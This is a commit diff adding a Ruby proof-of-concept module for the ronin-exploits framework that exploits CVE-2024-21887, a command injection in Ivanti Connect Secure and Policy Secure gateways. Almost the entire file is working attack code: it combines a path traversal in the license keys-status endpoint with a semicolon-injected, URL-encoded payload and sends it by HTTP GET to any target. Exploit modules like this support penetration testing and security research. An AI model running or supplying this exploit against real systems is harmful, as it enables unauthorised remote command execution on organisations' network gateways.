Added a PoC exploit for CVE-2024-21887 (closes #5).

exploits/ivanti/CVE-2024-21887.rb

@@ -0,0 +1,54 @@
+#!/usr/bin/env -S ronin-exploits run -f
+
+require 'ronin/exploits/command_injection'
+require 'ronin/exploits/mixins/http'
+require 'ronin/support/encoding/uri'
+
+module Ronin
+  module Exploits
+    class CVE_2024_21887 < CommandInjection
+
+      include Mixins::HTTP
+
+      register 'CVE-2024-21887'
+
+      quality :poc
+      release_date    '2024-01-19'
+      disclosure_date '2024-01-12'
+      advisory 'CVE-2024-21887'
+
+      author "Postmodern", email: "postmodern.mod3@gmail.com"
+      summary "Command injection in Ivanti Connect Secure and Policy Secure (9.x, 22.x)"
+      description <<~DESC
+        Ivanti Connect Secure and Invait Policy Secure versions 9.x and 22.x are
+        vulnerable to a command injection in the `/api/v1/license/keys-status/`
+        HTTP end-point.
+
+          GET /api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND
+          Content-Type: application/json
+
+      DESC
+      references [
+        "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
+        "https://github.com/zwxxb/CVE-2023-21887",
+        "https://github.com/zwxxb/CVE-2023-21887/blob/main/3xp.py"
+      ]
+
+      #
+      # Sends the HTTP GET request for
+      # `/api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND`
+      # to the target host.
+      #
+      def launch
+        escaped_command = ";#{payload}".uri_escape
+
+        response = http_get("/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command}", content_type: :json)
+
+        unless response.code == '200'
+          fail("GET #{base_url}/api/v1/totp/user-backup-code/../../license/keys-status/#{escaped_command} returned HTTP #{response.code}")
+        end
+      end
+
+    end
+  end
+end